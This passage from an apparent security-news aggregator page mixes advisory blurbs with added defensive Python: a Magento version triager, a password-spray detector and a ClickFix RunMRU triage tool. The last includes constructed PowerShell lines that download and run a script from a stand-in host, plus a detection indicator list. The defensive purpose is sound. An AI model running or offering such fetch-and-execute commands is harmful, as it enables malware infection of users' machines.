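NEWEST_LISTED = max(LAST_AFFECTED)

# Magento versions look like "2.4.6" or "2.4.6-p5" (p = security patch level).
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-p(\d+))?$")

# Constructed inventory: hostname -> reported version (not real hosts).
SAMPLE_INVENTORY = {
    "shop-1.example": "2.4.7",
    "shop-2.example": "2.4.7-p1",
    "shop-3.example": "2.4.6-p5",
    "shop-4.example": "2.4.6-p10",
    "shop-5.example": "2.4.3-p3",
    "shop-6.example": "2.4.8-beta1",
}


def parse_version(s):
    """Split '2.4.6-p5' into ((2, 4, 6), 5); a missing -pN means patch level 0."""
    m = VERSION_RE.match(s.strip())
    if not m:
        raise ValueError(f"unrecognised Magento version string: {s!r}")
    major, minor, release, patch = m.groups()
    return (int(major), int(minor), int(release)), int(patch or 0)


def is_affected(version):
    """True/False for the four listed release lines and anything newer.

    Returns None for release lines older than 2.4.4: the advisory text says
    those are exploitable only if the installed PHP and glibc are themselves
    vulnerable, so a version string alone cannot settle it (assumed reading).
    """
    base, patch = parse_version(version)
    if base in LAST_AFFECTED:
        return patch <= LAST_AFFECTED[base]
    if base > NEWEST_LISTED:
        return False
    return None


def triage(inventory):
    """Classify each host so the exposed ones can be patched first."""
    labels = {True: "affected", False: "not affected", None: "needs-php-glibc-check"}
    out = {}
    for host, version in inventory.items():
        try:
            out[host] = labels[is_affected(version)]
        except ValueError:
            out[host] = "unparsable"
    return out


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_INVENTORY).items():
        print(f"{host:16} {SAMPLE_INVENTORY[host]:12} {verdict}")
```

A version string says nothing about hotfixes or isolated patches applied without a version bump, so treat "affected" as "verify on the host", and check the PHP and glibc versions separately for the older lines.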

 Feed

Ubuntu Security Notice 7028-2 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

 Feed

Ubuntu Security Notice 7059-2 - USN-7059-1 fixed a vulnerability in OATH Toolkit library. This update provides the corresponding update for Ubuntu 24.10. Fabian Vogt discovered that OATH Toolkit incorrectly handled file permissions. A remote attacker could possibly use this issue to overwrite root owned files, leading to a privilege escalation attack.

 Feed

Red Hat Security Advisory 2024-8116-03 - An update for java-1.8.0-openjdk is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Issues addressed include buffer overflow and integer overflow vulnerabilities.

 Feed

Picture your company's data as a vast, complex jigsaw puzzle—scattered across clouds, devices, and networks. Some pieces are hidden, some misplaced, and others might even be missing entirely. Keeping your data secure in today’s fast-evolving landscape can feel like an impossible challenge. But there’s a game-changing solution: Data Security Posture Management (DSPM). Think of it as a high-tech,

 Feed

Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks. "Since October 2023, Iranian actors have used brute force and password spraying to compromise user accounts and obtain access to organizations in the healthcare and
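The distinguishing signature of password spraying is many accounts, few guesses each, from one source; classic brute force is the inverse. The following is an added example (not from the advisory) of detection logic run over constructed authentication log lines in an assumed one-line format; the source addresses come from the RFC 5737 documentation ranges and the thresholds are assumptions to tune per environment.

```python
"""Detect password spraying and single-account brute force in auth logs.

Added example for this page, not code from the advisory. The log format and
every line in SAMPLE_LOG are constructed (addresses are from the RFC 5737
documentation ranges); the thresholds are assumptions to tune per environment.
"""
import re
from collections import Counter, defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts outcome user src")

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) "
    r"(?P<outcome>LOGIN_FAILED|LOGIN_OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

# Constructed log: one spray (6 users, one try each, then a success),
# one brute force against "admin", and one legitimate typo-then-login.
SAMPLE_LOG = """\
2024-10-15T08:00:01Z LOGIN_FAILED user=alice src=203.0.113.5
2024-10-15T08:00:04Z LOGIN_FAILED user=bob src=203.0.113.5
2024-10-15T08:00:07Z LOGIN_FAILED user=carol src=203.0.113.5
2024-10-15T08:00:10Z LOGIN_FAILED user=dave src=203.0.113.5
2024-10-15T08:00:13Z LOGIN_FAILED user=erin src=203.0.113.5
2024-10-15T08:00:16Z LOGIN_FAILED user=frank src=203.0.113.5
2024-10-15T08:00:40Z LOGIN_OK user=erin src=203.0.113.5
2024-10-15T08:05:00Z LOGIN_FAILED user=admin src=198.51.100.7
2024-10-15T08:05:05Z LOGIN_FAILED user=admin src=198.51.100.7
2024-10-15T08:05:10Z LOGIN_FAILED user=admin src=198.51.100.7
2024-10-15T08:05:15Z LOGIN_FAILED user=admin src=198.51.100.7
2024-10-15T08:05:20Z LOGIN_FAILED user=admin src=198.51.100.7
2024-10-15T08:10:00Z LOGIN_FAILED user=alice src=192.0.2.9
2024-10-15T08:10:09Z LOGIN_OK user=alice src=192.0.2.9
"""


def parse_log(text):
    """Parse matching lines into Events; lines in another format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(Event(ts, m["outcome"], m["user"], m["src"]))
    return events


def detect(text, window=timedelta(minutes=10), spray_users=5,
           spray_max_per_user=2, brute_attempts=5):
    """Return one finding per offending source address.

    Spray: within `window`, failures against >= spray_users distinct accounts
    with at most spray_max_per_user tries each (many users, few guesses).
    Brute force: >= brute_attempts failures against one account in `window`.
    Any LOGIN_OK from a flagged source after the window opened is reported as
    a likely compromised account.
    """
    by_src = defaultdict(list)
    for e in sorted(parse_log(text), key=lambda e: e.ts):
        by_src[e.src].append(e)

    findings = []
    for src, events in by_src.items():
        failures = [e for e in events if e.outcome == "LOGIN_FAILED"]
        finding = None
        for i, current in enumerate(failures):
            # Sliding window of this source's failures ending at `current`.
            recent = [f for f in failures[: i + 1] if current.ts - f.ts <= window]
            per_user = Counter(f.user for f in recent)
            if len(per_user) >= spray_users and max(per_user.values()) <= spray_max_per_user:
                kind = "password_spray"
            elif max(per_user.values()) >= brute_attempts:
                kind = "brute_force"
            else:
                continue
            if finding is None:
                finding = {"type": kind, "src": src, "window_start": recent[0].ts}
            # Keep the counts growing while the pattern continues.
            finding["distinct_users"] = len(per_user)
            finding["failed_attempts"] = sum(per_user.values())
        if finding is not None:
            finding["successful_logins"] = sorted(
                {e.user for e in events
                 if e.outcome == "LOGIN_OK" and e.ts >= finding["window_start"]})
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

Real sprays are usually spread across many source addresses and paced below per-account lockout thresholds, so in production the same window logic is typically keyed on an ASN, a client fingerprint or a tenant rather than a single IP; a LOGIN_OK from a flagged source, as for "erin" above, is the event worth paging on.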

 Feed

Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems. "This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in
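Because the ClickFix lure depends on the victim pasting the command into the Windows Run dialog, Explorer leaves a trace in the RunMRU registry key. The following is an added example, not code from Sekoia or from the campaign, that parses a constructed `reg export` of that key and flags entries that launch an interpreter with ClickFix-style traits; the indicator list, the fake-verification-comment heuristic and the meet-join.example hostname are assumptions.

```python
"""Triage the Windows Run-dialog history (RunMRU) for pasted ClickFix-style commands.

Added example for this page, not code from Sekoia or from the campaign. Explorer
records Run dialog entries under HKCU\\...\\Explorer\\RunMRU: one value per slot,
the recency order in MRUList, each command stored with a trailing "\\1".
Everything in SAMPLE_REG is constructed, including the meet-join.example host;
the indicator list and the "fake verification" comment heuristic are assumptions.
"""
import base64
import re

RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Constructed payload for the -enc case (PowerShell expects base64 of UTF-16LE).
DECODED_PAYLOAD = "iex (iwr https://meet-join.example/x.ps1)"
ENCODED_PAYLOAD = base64.b64encode(DECODED_PAYLOAD.encode("utf-16-le")).decode()


def reg_escape(value):
    """Escape a string the way `reg export` writes REG_SZ data."""
    return value.replace("\\", "\\\\").replace('"', '\\"')


# Constructed RunMRU contents: two ClickFix-style entries, a benign "cmd" and a
# UNC path. MRUList "cbda" lists slots most recent first.
SAMPLE_VALUES = {
    "a": "cmd\\1",
    "b": ('powershell -w hidden -ep bypass -c "iwr https://meet-join.example/v.ps1 | iex"'
          " # I am not a robot - reCAPTCHA Verification ID: 7624\\1"),
    "c": f"powershell -w hidden -enc {ENCODED_PAYLOAD}\\1",
    "d": "\\\\fileserver\\share\\1",
    "MRUList": "cbda",
}
SAMPLE_REG = "Windows Registry Editor Version 5.00\n\n[" + RUNMRU_KEY + "]\n" + "\n".join(
    f'"{name}"="{reg_escape(value)}"' for name, value in SAMPLE_VALUES.items()) + "\n"

REG_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
INTERPRETER_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|bitsadmin|curl|msiexec)\b", re.I)
INDICATORS = [  # (regex, label); assumed heuristics, not a vendor signature set
    (r"-(?:w|windowstyle)\s+hidden", "hidden window"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"\biwr\b|invoke-webrequest|downloadstring|downloadfile", "web download"),
    (r"https?://", "URL in Run command"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"#.*(?:not a robot|verification|captcha)", "fake verification comment"),
]


def parse_reg_values(reg_text, key):
    """Return {name: value} for the string values under `key` in a .reg export."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        m = REG_VALUE_RE.match(line) if in_key else None
        if m:
            name, value = (re.sub(r"\\(.)", r"\1", s) for s in m.groups())
            values[name] = value
    return values


def run_history(reg_text):
    """Run-dialog commands, most recent first, with the trailing '\\1' stripped."""
    values = parse_reg_values(reg_text, RUNMRU_KEY)
    history = []
    for slot in values.get("MRUList", ""):
        command = values.get(slot)
        if command is not None:
            history.append(command[:-2] if command.endswith("\\1") else command)
    return history


def decode_encoded(command):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(reg_text):
    """Flag Run history entries that launch an interpreter with suspicious traits."""
    findings = []
    for rank, command in enumerate(run_history(reg_text)):
        decoded = decode_encoded(command)
        hits = []
        for text in (command, decoded or ""):
            hits += [label for pat, label in INDICATORS
                     if label not in hits and re.search(pat, text, re.I)]
        if INTERPRETER_RE.search(command) and hits:
            findings.append({"rank": rank, "command": command,
                             "decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG):
        print(f["rank"], f["indicators"], f["decoded"] or f["command"])
```

On a live host, export the key with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` (the file is UTF-16, so open it with `encoding="utf-16"`) and pass the text to `triage()`. A clean RunMRU does not clear the host: the same command can also be pasted into a terminal or the File Explorer address bar, so pair this with process-creation telemetry for PowerShell launched from explorer.exe.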

 Feed

Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data. The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133 (CVSS score: 5.5). It was addressed by Apple as part of macOS Sequoia 15 by

Aggregator history: Friday, October 18, 2024